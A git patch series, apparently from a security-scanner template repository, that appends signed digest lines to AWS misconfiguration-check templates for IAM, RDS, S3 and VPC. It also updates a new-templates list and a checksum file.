4a0a00473045022100d15b76ce838fa09da565afb9414204e3a5bc5487d1cca1ea4fb3560c339ac6f60220291edc1503af6dfa14709487d50d0eff776aafaaf1d07580cc1199ea21fb48ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/iam/iam-mfa-enable.yaml b/cloud/aws/iam/iam-mfa-enable.yaml index b373266c7f..5d649f479c 100644 --- a/cloud/aws/iam/iam-mfa-enable.yaml +++ b/cloud/aws/iam/iam-mfa-enable.yaml @@ -46,3 +46,4 @@ code: - type: dsl dsl: - '"MFA is no enabled for IAM User " + user' +# digest: 4a0a00473045022100f326cf9a9fdd5f737d1126dd4938a233059a58f816e7e75a9a0bbab2f9a5d8230220219f4277870b52c124be28db9d8adfe6b88d2ea8b1570756a3f7772384887eff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/iam/iam-password-policy.yaml b/cloud/aws/iam/iam-password-policy.yaml index 3de0b7e60d..0462830302 100644 --- a/cloud/aws/iam/iam-password-policy.yaml +++ b/cloud/aws/iam/iam-password-policy.yaml @@ -26,3 +26,4 @@ code: - type: dsl dsl: - '"AWS cloud account is not configured with a custom IAM password policy"' +# digest: 490a00463044022055c5e7c44c862bac281cda22b1f74de43c5c590680abbfdef4c7814f844af67702205eb87929fe29247fa90db958e8c56b23e62472b680ae98f265da4a2e57d53f95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/iam/iam-root-mfa.yaml b/cloud/aws/iam/iam-root-mfa.yaml index 9f667d4781..9a855e2acd 100644 --- a/cloud/aws/iam/iam-root-mfa.yaml +++ b/cloud/aws/iam/iam-root-mfa.yaml @@ -26,3 +26,4 @@ code: - type: dsl dsl: - '"MFA is not enabled on your AWS Root account"' +# digest: 4b0a00483046022100add350e50addd6d7c475c7ab805a9869384178065cc1aef7e96777448765fa2e022100cd5ae007e6406f2f721bc5d308de70f92456f2d0280b778690b85a80cd2fdb23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/iam/iam-ssh-keys-rotation.yaml b/cloud/aws/iam/iam-ssh-keys-rotation.yaml index aeb70ce6ee..ca9e3a8066 100644 --- a/cloud/aws/iam/iam-ssh-keys-rotation.yaml +++ b/cloud/aws/iam/iam-ssh-keys-rotation.yaml @@ -47,3 +47,4 @@ code: - type: dsl dsl: - '"The SSH Public Key " + accesskey +" is older than 90 days"' +# digest: 490a00463044022017e707c66f9a058bd875e7a516d99585a1be526405545647011958874bd784a702201259fdf89b05b2fa171d789e014fe98d7949010ff420be02f0ef7183565544ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/iam/iam-unapproved-policy.yaml b/cloud/aws/iam/iam-unapproved-policy.yaml index 42d7d8fb65..9392c5117c 100644 --- a/cloud/aws/iam/iam-unapproved-policy.yaml +++ b/cloud/aws/iam/iam-unapproved-policy.yaml @@ -35,3 +35,4 @@ code: - type: dsl dsl: - '"Unapproved IAM policy is used within your AWS cloud account"' +# digest: 4a0a00473045022100cf22f4542262ded32bcf64050e268d3b514e907385f8c67a8a4f888302bb48b202206b2ee99707ba578560bc83ad3ceeae5e3981288199d898d27d0090f34f6af408:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/iam/iam-user-password-change.yaml b/cloud/aws/iam/iam-user-password-change.yaml index 01bd859d59..483c80c910 100644 --- a/cloud/aws/iam/iam-user-password-change.yaml +++ b/cloud/aws/iam/iam-user-password-change.yaml @@ -26,3 +26,4 @@ code: - type: dsl dsl: - '"AllowUsersToChangePassword Policy is not enabled in your AWS account"' +# digest: 4b0a00483046022100b046545d3c72c54dee9c4051661d61c8241cbce1fb0f655fa4bb1e8461b3f295022100a7bb33ba3ddff07e68db9bd748802715215b8d62be69ab27fab22c5e539cbb28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/iam/ssl-cert-renewal.yaml b/cloud/aws/iam/ssl-cert-renewal.yaml index f3663cbb97..a917d78872 100644 --- a/cloud/aws/iam/ssl-cert-renewal.yaml +++ b/cloud/aws/iam/ssl-cert-renewal.yaml @@ -27,3 +27,4 @@ code: - type: dsl dsl: - 'certificate + " Certificate is about to expire in 30 days"' +# digest: 4a0a00473045022100a517288f527ffb0f08d1f6803d7d738d8c9ed2a34f35e32b824cabbe7f3fa41b022028ebdfe7453cc66f3f511e46c5ffbda6db8dc43551271a101edb11021fad7fd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/aurora-copy-tags-snap.yaml b/cloud/aws/rds/aurora-copy-tags-snap.yaml index 693c7ba87f..bfefd94533 100644 --- a/cloud/aws/rds/aurora-copy-tags-snap.yaml +++ b/cloud/aws/rds/aurora-copy-tags-snap.yaml @@ -53,3 +53,4 @@ code: - type: dsl dsl: - '"Copy Tags To Snapshot is not enable for cluster " + cluster' +# digest: 490a00463044022017828b27f24bd205df0e6c14c80b4cae52d2f6366dde8c60cc58302d7ca9c8ba022062233631583c3e674bb1daebdb9375c3501900fb1ba9ed7a06d972f8b7265b85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/aurora-delete-protect.yaml b/cloud/aws/rds/aurora-delete-protect.yaml index aa5f1ff91f..c7ae76d4fb 100644 --- a/cloud/aws/rds/aurora-delete-protect.yaml +++ b/cloud/aws/rds/aurora-delete-protect.yaml @@ -53,3 +53,4 @@ code: - type: dsl dsl: - '"Deletion Protection safety feature is not enabled for " + cluster' +# digest: 4b0a00483046022100c1c1ed75c7401266f13e1fc388a357df843c7994ab44ae8f501b14842ab7ec24022100b6c077b49006fb9ca13885abddf6be9c787d64eb415a13972e5fa3ea637792f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/iam-db-auth.yaml b/cloud/aws/rds/iam-db-auth.yaml index 8bfd0e4a41..c76c5618b5 100644 --- a/cloud/aws/rds/iam-db-auth.yaml +++ b/cloud/aws/rds/iam-db-auth.yaml @@ -53,3 +53,4 @@ code: - type: dsl dsl: - '"Database Authentication feature is not enabled for RDS database instance " + db' +# digest: 4a0a00473045022100de421600413f2bb3306a9173334cd465c628dd5a198cec9ebe3bf5a373b4479602200bd9a29ac4bc3efe52763411a53243855f599f703baa22c7292da16898754f12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/rds-backup-enable.yaml b/cloud/aws/rds/rds-backup-enable.yaml index e9a2314ee2..4a61f55d05 100644 --- a/cloud/aws/rds/rds-backup-enable.yaml +++ b/cloud/aws/rds/rds-backup-enable.yaml @@ -53,3 +53,4 @@ code: - type: dsl dsl: - '"Automated backups are not enabled for " + db + " RDS database instance"' +# digest: 490a0046304402202cafc27efb26d112eaeeda54182636abc27e1c7d4c685250eee139e6016ad0e00220696ff967f5e74543e24b1f563a48870e20c7a651ebf098221cb3aa53d92d0a4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/rds-deletion-protection.yaml b/cloud/aws/rds/rds-deletion-protection.yaml index 7757553fe2..9e3cf32f15 100644 --- a/cloud/aws/rds/rds-deletion-protection.yaml +++ b/cloud/aws/rds/rds-deletion-protection.yaml @@ -54,3 +54,4 @@ code: - type: dsl dsl: - '"RDS Deletion protection feature is not enabled for RDS database instance " + db' +# digest: 4b0a00483046022100914032dbc9479e0c23f03d553ff358b24dbb159d2b0e39591c929e1b7392f357022100dd0d109579a0dba307e0e203996af0754cc7d40cf1ef7adb218b01cba7fae2a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/rds-encryption-check.yaml b/cloud/aws/rds/rds-encryption-check.yaml index aa1ae77de7..0738c976ec 100644 --- a/cloud/aws/rds/rds-encryption-check.yaml +++ b/cloud/aws/rds/rds-encryption-check.yaml @@ -53,3 +53,4 @@ code: - type: dsl dsl: - '"The encryption of data at rest is not enabled for " + db + " RDS database instance"' +# digest: 4a0a00473045022057333f0cba59e048aec18908bd8cbda6a4ab5398581190a3602a82d1f7f63f140221008c6002f40daa4eef203c0be542377e675dd0b28d3595fa4664449f30f13f325d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/rds-event-notify.yaml b/cloud/aws/rds/rds-event-notify.yaml index 99f05db4e2..550824d617 100644 --- a/cloud/aws/rds/rds-event-notify.yaml +++ b/cloud/aws/rds/rds-event-notify.yaml @@ -33,3 +33,4 @@ code: - type: dsl dsl: - '"No event notifications for RDS resources in " + region + " AWS region"' +# digest: 4a0a0047304502203da20f61e273f1598025e8b5fc491882b2b9b93d743bf7be37209af3351653b0022100b109b8c9e591621fe1c087381073e5d49cad3d424fa9a3491609c28d4bb8cbdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/rds-event-sub-enable.yaml b/cloud/aws/rds/rds-event-sub-enable.yaml index 7150f48056..794689aa19 100644 --- a/cloud/aws/rds/rds-event-sub-enable.yaml +++ b/cloud/aws/rds/rds-event-sub-enable.yaml @@ -33,3 +33,4 @@ code: - type: dsl dsl: - '"There are no Amazon RDS event subscriptions created for instance level events in " + region + " AWS region"' +# digest: 4a0a00473045022046dbc7d74b95e340ebc6d0bc27c308f378cea938470e758605822ac111ed6843022100ba1ee6fdbb6940216c57cbd8666cb56a4645ad5f8138bd63b649fb85abf80b5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/rds-event-sub.yaml b/cloud/aws/rds/rds-event-sub.yaml index fcc8aec418..a1352a3b91 100644 --- a/cloud/aws/rds/rds-event-sub.yaml +++ b/cloud/aws/rds/rds-event-sub.yaml @@ -33,3 +33,4 @@ code: - type: dsl dsl: - '"There are no Amazon RDS event subscriptions created for database security groups available in " + region + " AWS region."' +# digest: 4a0a00473045022100d0e7c297ffbf01f4d58eb375f52c497c11d13d84ee6bef8ed036f4a106d379c202206dc81dfc93a492e7f043e3f0e9ca706ce541e875fcf1cec0345a2082cb41fdb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/rds-gp-ssd-usage.yaml b/cloud/aws/rds/rds-gp-ssd-usage.yaml index f5aa7667eb..f352ac58ab 100644 --- a/cloud/aws/rds/rds-gp-ssd-usage.yaml +++ b/cloud/aws/rds/rds-gp-ssd-usage.yaml @@ -53,3 +53,4 @@ code: - type: dsl dsl: - 'db + " RDS instance uses Provisioned IOPS SSD, not the most cost-effective storage"' +# digest: 4a0a00473045022002f5c7fdd4d9d80a6820cfc1f222bfed3a1d9ad2e9f25cd1ef7757d60774a7dc022100c202e64f627d1aadd2a131aecdc048917a11798572597b382064897ed0848d3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/rds-public-snapshot.yaml b/cloud/aws/rds/rds-public-snapshot.yaml index 70a6fcaed9..6e067db633 100644 --- a/cloud/aws/rds/rds-public-snapshot.yaml +++ b/cloud/aws/rds/rds-public-snapshot.yaml @@ -53,3 +53,4 @@ code: - type: dsl dsl: - '"RDS snapshot " + snapshot + " is public"' +# digest: 4a0a0047304502210081a28e626fa15113ec4728cae1cd78218b292f7c71adc72cdb0b6d957475955302207063c6eda8c853ca2b1041f2751246979a75381a89e64b262b679667da1eb1eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/rds-public-subnet.yaml b/cloud/aws/rds/rds-public-subnet.yaml index 83a3d7e467..7937f55c6b 100644 --- a/cloud/aws/rds/rds-public-subnet.yaml +++ b/cloud/aws/rds/rds-public-subnet.yaml @@ -71,3 +71,4 @@ code: - type: dsl dsl: - 'db + " RDS instance is setup within a public subnet"' +# digest: 4b0a00483046022100d05dd8cfd16004c66141210fee94b5b5b1bdca54b4320091e86f7b7d018c336e022100fcf57d954bb32ef2d5eaf09ca000c729ef9d372ef651d5066f8d1a1e6aee8746:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/rds-ri-payment-fail.yaml b/cloud/aws/rds/rds-ri-payment-fail.yaml index 183fc42af7..40c1bf2e1a 100644 --- a/cloud/aws/rds/rds-ri-payment-fail.yaml +++ b/cloud/aws/rds/rds-ri-payment-fail.yaml @@ -53,3 +53,4 @@ code: - type: dsl dsl: - '"RDS Reserved Instance purchase has failed for " + db' +# digest: 4a0a00473045022040705df585fbeec117d8605a7eb385b6fb0ae5cca87f948b79aef51f4a4b5b19022100a62f52ca4c10ab087a8d672d8288e120540531595b354c0663a7b5c7426ee198:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/rds-snapshot-encryption.yaml b/cloud/aws/rds/rds-snapshot-encryption.yaml index f20eb715d4..49f17f0de3 100644 --- a/cloud/aws/rds/rds-snapshot-encryption.yaml +++ b/cloud/aws/rds/rds-snapshot-encryption.yaml @@ -53,3 +53,4 @@ code: - type: dsl dsl: - '"Amazon RDS database snapshot " + snapshot + " is not encrypted"' +# digest: 490a0046304402207212f314b007f635435474f0ab2253e018047b2f878450e253223d5daa74da3f022064293bf9b3a736189797d2b46e1ad224dd05fa73dfe1ff2d0531a229ab2c89c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/s3/s3-access-logging.yaml b/cloud/aws/s3/s3-access-logging.yaml index 16ba9112d3..4d86b97f8f 100644 --- a/cloud/aws/s3/s3-access-logging.yaml +++ b/cloud/aws/s3/s3-access-logging.yaml @@ -46,3 +46,4 @@ code: - type: dsl dsl: - '"The S3 bucket " + bucket +" does not have access logging enabled."' +# digest: 4b0a004830460221009c7c7b0d5efd419b91df9f3a9c18cbb5c3cf3e05586c1a2feaf8e1c1c1b5d5b5022100ac7392ba990a22432ad62945a93d61578dd95013697d6c3aefd30fa5e9decaac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/s3/s3-auth-fullcontrol.yaml b/cloud/aws/s3/s3-auth-fullcontrol.yaml index 028eb24393..c9a52a4e69 100644 --- a/cloud/aws/s3/s3-auth-fullcontrol.yaml +++ b/cloud/aws/s3/s3-auth-fullcontrol.yaml @@ -46,3 +46,4 @@ code: - type: dsl dsl: - '"FULL_CONTROL is enabled for Authenticated Users on S3 Bucket " + bucket' +# digest: 4b0a00483046022100ae50a09843b165ba2fcd9f5fb5774c60c2ba2ca3ec8461b893c6eb47cce50cf8022100ab31d7ca772ca4fdce476fb02441aaae4130fe68605b346dd30bcaa9f2fb0c3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/s3/s3-bucket-key.yaml b/cloud/aws/s3/s3-bucket-key.yaml index 36b39ae40b..aa49b7d2d1 100644 --- a/cloud/aws/s3/s3-bucket-key.yaml +++ b/cloud/aws/s3/s3-bucket-key.yaml @@ -46,3 +46,4 @@ code: - type: dsl dsl: - '"Key is not enabled for S3 Bucket " + bucket' +# digest: 490a0046304402207628f02f223a9c45013004373f631bfe358fe0898a91b4558b461cdbcb0cb33f02204c02ff4be552778912c6b81a4d7f06b0436bf0facd4066dd1b7b6a60c7fe8727:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/s3/s3-bucket-policy-public-access.yaml b/cloud/aws/s3/s3-bucket-policy-public-access.yaml index e57f941a48..2d1b41dd32 100644 --- a/cloud/aws/s3/s3-bucket-policy-public-access.yaml +++ b/cloud/aws/s3/s3-bucket-policy-public-access.yaml @@ -54,3 +54,4 @@ code: - type: dsl dsl: - '"The S3 bucket " + bucket +" is publicly accessible via Policy"' +# digest: 4b0a004830460221009b48d546c9c75d61879e6371e646807f994d64408c3f84d48c9a9b344b9743410221009ed66db2acf2d13fb22b03344e70b7679191e4d76de5615fb69753c02d49306d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/s3/s3-mfa-delete-check.yaml b/cloud/aws/s3/s3-mfa-delete-check.yaml index ca54173827..13ccba19cd 100644 --- a/cloud/aws/s3/s3-mfa-delete-check.yaml +++ b/cloud/aws/s3/s3-mfa-delete-check.yaml @@ -46,3 +46,4 @@ code: - type: dsl dsl: - '"The S3 bucket " + bucket +" is not configured to use MFA Delete feature"' +# digest: 4a0a0047304502207b18bcd326a382b691f9645ba66223e79733146fbaaa7632197a652cb7319085022100d690b22a500eb8036ca670d596ead85d56ce5e576f1147e5e73430a5d49c3765:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/s3/s3-public-read-acp.yaml b/cloud/aws/s3/s3-public-read-acp.yaml index 328fa9b480..a365761525 100644 --- a/cloud/aws/s3/s3-public-read-acp.yaml +++ b/cloud/aws/s3/s3-public-read-acp.yaml @@ -47,3 +47,4 @@ code: - type: dsl dsl: - '"The S3 bucket " + bucket +" have public READ_ACP access"' +# digest: 4b0a00483046022100ed3c7c8177b632e1968b920b9eef94ffdc0784d3b4cfef7073e31fa45879d929022100a4515cf3df6e19fdcc7f9c9460074d6310983bbdd4687e83cce86c290cb62c18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/s3/s3-public-read.yaml b/cloud/aws/s3/s3-public-read.yaml index d5415890b1..56877aa63a 100644 --- a/cloud/aws/s3/s3-public-read.yaml +++ b/cloud/aws/s3/s3-public-read.yaml @@ -47,3 +47,4 @@ code: - type: dsl dsl: - '"The S3 bucket " + bucket +" have public READ access"' +# digest: 4a0a0047304502210096282cee509cda8603576b6bf36e9726a85cd0e5c7ffbf1a1b521840e04b9a0f022003295ca19e84cf783276bd6c7a2fa978a92543199f6da355ddfb130e465442da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/s3/s3-public-write-acp.yaml b/cloud/aws/s3/s3-public-write-acp.yaml index 43ba278e3f..aff44da984 100644 --- a/cloud/aws/s3/s3-public-write-acp.yaml +++ b/cloud/aws/s3/s3-public-write-acp.yaml @@ -46,3 +46,4 @@ code: - type: dsl dsl: - '"The S3 bucket " + bucket +" have public WRITE_ACP access"' +# digest: 490a004630440220164c9d55d2b50ac44caa26edd47e799e3ec62871676e74736d108a8541f0c2440220136ef5897894c74ad7fb3f936e269b6a777cc4e8f520c42142558990bea8eba9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/s3/s3-public-write.yaml b/cloud/aws/s3/s3-public-write.yaml index a97f7b3140..d2192c8cc1 100644 --- a/cloud/aws/s3/s3-public-write.yaml +++ b/cloud/aws/s3/s3-public-write.yaml @@ -46,3 +46,4 @@ code: - type: dsl dsl: - '"The S3 bucket " + bucket +" have public WRITE access"' +# digest: 490a004630440220795c3882ab9cb8a093b5e2e83c7822aaf15bfe4cff0426f3a6e5743196aa67730220375072f3c8dff6626dd361a31d12615188c7e8bd445e92f41fe755c323cefc22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/s3/s3-server-side-encryption.yaml b/cloud/aws/s3/s3-server-side-encryption.yaml index 0a6c63d355..448ee59987 100644 --- a/cloud/aws/s3/s3-server-side-encryption.yaml +++ b/cloud/aws/s3/s3-server-side-encryption.yaml @@ -46,3 +46,4 @@ code: - type: dsl dsl: - '"The S3 bucket " + bucket +" is not encrypted at rest"' +# digest: 490a0046304402203e012cd857cace30b445932f893b9bd0f7bc709eec9f6cb5689fd30a520525e0022029cde524c58042593e654d36bfd7dcfb81b9508c534ec7750afe9ff96ad921d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/s3/s3-versioning.yaml b/cloud/aws/s3/s3-versioning.yaml index 4ff725d792..30531fed21 100644 --- a/cloud/aws/s3/s3-versioning.yaml +++ b/cloud/aws/s3/s3-versioning.yaml @@ -47,3 +47,4 @@ code: - type: dsl dsl: - '"Versioning is not enabled for S3 Bucket " + bucket' +# digest: 4b0a00483046022100ceb8b6be9871b6b9b57c5aa9add8902c3177845310afee02c6f8acc0cec48331022100fc98d53a049eaf0f8450f979233fffec17fd5c23d4c90fb78e68d8f05869f7d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/vpc/nacl-open-inbound.yaml b/cloud/aws/vpc/nacl-open-inbound.yaml index b255105a5f..b034f682de 100644 --- a/cloud/aws/vpc/nacl-open-inbound.yaml +++ b/cloud/aws/vpc/nacl-open-inbound.yaml @@ -60,3 +60,4 @@ code: - type: dsl dsl: - '"Access to the VPC subnets associated with your NACL " + naclid + " is not restricted."' +# digest: 490a00463044022061fa0f1f88763697856638e53fa1b78a8587487f6f691d28fdd57818ef2ab00a02204919554ac19da3748543fd6a0299c765833719eece0b93ca663319a3b75faba2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/vpc/nacl-outbound-restrict.yaml b/cloud/aws/vpc/nacl-outbound-restrict.yaml index 717fdc702d..ef060c8c95 100644 --- a/cloud/aws/vpc/nacl-outbound-restrict.yaml +++ b/cloud/aws/vpc/nacl-outbound-restrict.yaml @@ -60,3 +60,4 @@ code: - type: dsl dsl: - '"Access to the VPC subnets associated with your NACL " + naclid + " is not restricted."' +# digest: 4a0a00473045022100e86f2a3e5590550fdcae3b2df793550b4ef1c178662d2231cc58bfb4d120c8c6022013a6044df37c3210f35945503f89ceae1bec5494e3d893bc4bddeef18ab5a460:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/vpc/nat-gateway-usage.yaml b/cloud/aws/vpc/nat-gateway-usage.yaml index aca1bddf87..8757af280b 100644 --- a/cloud/aws/vpc/nat-gateway-usage.yaml +++ b/cloud/aws/vpc/nat-gateway-usage.yaml @@ -53,3 +53,4 @@ code: - type: dsl dsl: - 'vpc + " VPC is not using Managed NAT Gateways"' +# digest: 4a0a00473045022100c0877797c85620a3b1a36e36908c96c828bcd0dc31d1b46eadfbad0cb57887cb0220322e780cb1d41741e04ff1fa0dfd2d35efe10a367c625bf3dfa3ef63c1297eb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/vpc/unrestricted-admin-ports.yaml b/cloud/aws/vpc/unrestricted-admin-ports.yaml index 7092e81088..3a632591f5 100644 --- a/cloud/aws/vpc/unrestricted-admin-ports.yaml +++ b/cloud/aws/vpc/unrestricted-admin-ports.yaml @@ -62,3 +62,4 @@ code: - type: dsl dsl: - '"Access to the VPC subnets associated with your NACL " + naclid + " is not restricted."' +# digest: 4b0a00483046022100c7ef9e19cd61d8fcfb7e1d1faf314a723142d80e0796b5101a964a2ece956abe022100c3b4d818fb5d2da95501f4e15d27dab96a8af3b6c26c7e1da86e6a8b98b2c35d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/vpc/vpc-endpoint-exposed.yaml b/cloud/aws/vpc/vpc-endpoint-exposed.yaml index b11359a0ef..e8d4975bdd 100644 --- a/cloud/aws/vpc/vpc-endpoint-exposed.yaml +++ b/cloud/aws/vpc/vpc-endpoint-exposed.yaml @@ -60,3 +60,4 @@ code: - type: dsl dsl: - '"VPC endpoints for " + vpc + "are exposed."' +# digest: 4a0a0047304502206fa64b542b8c69a54cd76e83666f0b97b830db5028eb2b684f10388b858f03c7022100a060eff71326c75b63bd7b7caa82a62b376f352503548f36ae7875e06db2b0d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/vpc/vpc-endpoints-not-deployed.yaml b/cloud/aws/vpc/vpc-endpoints-not-deployed.yaml index 6a41cd190e..887ccce5c2 100644 --- a/cloud/aws/vpc/vpc-endpoints-not-deployed.yaml +++ b/cloud/aws/vpc/vpc-endpoints-not-deployed.yaml @@ -53,3 +53,4 @@ code: - type: dsl dsl: - '"VPC Endpoints Not Deployed in the VPC network " + vpc' +# digest: 4b0a00483046022100cdf521a3643f23886dee5b78e9910dbd5137467596cffd6cf43641721bdd4c8f022100ada84927f32db8433b532c73902d578b91b0721574bb78b9a37b252df5cd8beb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml b/cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml index c7f3a24c57..944bce4945 100644 --- a/cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml +++ b/cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml @@ -55,3 +55,4 @@ code: - type: dsl dsl: - '"Flow Logs feature is not enabled for the VPC " + vpc' +# digest: 4a0a0047304502201fd60ad86d7fc29391c14ef3ca473cca21f6dac84b73d1a81e87898e6ccb2e73022100dce88d76e827b4874c2672ed572625753817f3fd9642c10a7ab108e2eda2b794:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/vpc/vpn-tunnel-down.yaml b/cloud/aws/vpc/vpn-tunnel-down.yaml index 5986e7e76d..10d27b280a 100644 --- a/cloud/aws/vpc/vpn-tunnel-down.yaml +++ b/cloud/aws/vpc/vpn-tunnel-down.yaml @@ -53,3 +53,4 @@ code: - type: dsl dsl: - 'vpnid + " VPN tunnel is down"' +# digest: 4a0a00473045022060f2043ba01e3483298dce863674208b94591615f73b91d4cb47e17eda4ebe310221009cfa4282260a3014b1f77a021f5d8248c4590b61f5e5904685fbcd631e178992:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From c5ecf7be3dab4a0833f5fc73779f0e3678bb39e3 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 11 Apr 2024 15:04:25 +0000 Subject: [PATCH 0045/1768] Auto Generated New Template Addition List [Thu Apr 11 15:04:25 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index f978442b13..408b06b00f 100644 --- a/.new-additions +++ b/.new-additions @@ -96,6 +96,7 @@ http/default-logins/allnet/allnet-default-login.yaml http/default-logins/asus/asus-rtn16-default-login.yaml http/default-logins/asus/asus-wl500g-default-login.yaml http/default-logins/asus/asus-wl520GU-default-login.yaml +http/exposed-panels/akhq-panel.yaml http/exposed-panels/beyondtrust-priv-panel.yaml http/exposed-panels/mitel-micollab-panel.yaml http/exposed-panels/mitric-checker-panel.yaml From f6986ef898090aa694699a4fc8428115e7ca1879 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Apr 2024 15:04:35 +0000 Subject: [PATCH 0046/1768] Auto Generated Templates Checksum [Thu Apr 11 15:04:35 UTC 2024] :robot: --- templates-checksum.txt | 181 +++++++++++++++++++++-------------------- 1 file changed, 91 insertions(+), 90 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 635ff77254..162eee780c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -7,95 +7,95 @@ README_KR.md:174470dbc5c69e81f83ff816655a52cc8c5d7f26 TEMPLATES-STATS.json:871c8ecf0669b5b5d0805f13ec0262292d8b6d18 TEMPLATES-STATS.md:5233bda44efdfd1fc914d59f8fd0b9cfc93c6414 TOP-10.md:9fa0b88c35245bd492329ce0a6a93add476a5a47 -cloud/aws/acm/acm-cert-expired.yaml:12e275cd727bba9f791705d725fc4d1e52182d11 -cloud/aws/acm/acm-cert-renewal-30days.yaml:1352e153777b6f8174811f4b9aead50fe2695a77 -cloud/aws/acm/acm-cert-renewal-45days.yaml:bc0e7c9bf598ffc3c9d7471e75df96dbde2fd14d -cloud/aws/acm/acm-cert-validation.yaml:fa051e4a0b73f6499af8fc1276d2199183b7de00 -cloud/aws/acm/acm-wildcard-cert.yaml:b46b687fb561a97901a52406e0e22bb000515c7a -cloud/aws/aws-code-env.yaml:d710b261eb3073145ce01e422ae0f9182385cfa9 -cloud/aws/cloudtrail/cloudtrail-data-events.yaml:61d510fc941a748218eb0bb78b77b1c0bc4a972a -cloud/aws/cloudtrail/cloudtrail-disabled.yaml:e359c8ab5026da6b93e93230fac14e69823f174b -cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml:39136bb61b2f084fdeb44a5e931ca5d76dd30102 -cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml:6f71d1bc248dbef68fd3aa890d88ceed3c4fc3a2 -cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml:5ce846f06cb759b964ac0e43b5298c6d361a9723 -cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml:8efe76148f14127d25545a7da881226ac135e08b -cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml:8b27be33263241f170a371e6e77dc5d79d7bc2f2 -cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml:c5fd3835d7fc5707e45bfd489ef54027597a670d -cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml:92b445b32d8b58d7d1e934ddf7b6839712da5ffb -cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml:ebb18af8edd94205486cb56100753413a8545851 -cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml:64265da425decfab898aaa8fe74f036a57aff591 -cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml:cd932e8a2ec886f022c7fa5586f0c5643eb02cdb -cloud/aws/cloudwatch/cw-alarm-action-set.yaml:def287556f6a8d241bfa030d358ddfe2d2841223 -cloud/aws/cloudwatch/cw-alarms-actions.yaml:43a1f4d02fdedc624e120c65e02237aff194cb80 -cloud/aws/ec2/ec2-imdsv2.yaml:a5c31c001ad0b1368aec28305fa39a462735ba78 -cloud/aws/ec2/ec2-public-ip.yaml:4fb38773cdb6be12a066b805230d0d0d66d92d2e -cloud/aws/ec2/ec2-sg-egress-open.yaml:e8cad48c16399176967580509025eff311a04660 -cloud/aws/ec2/ec2-sg-ingress.yaml:04d0c58198fc64f40b296cbee9431d5f825898f3 -cloud/aws/ec2/ec2-unrestricted-cifs.yaml:3ac0137774789879d594522af81b950d45346e46 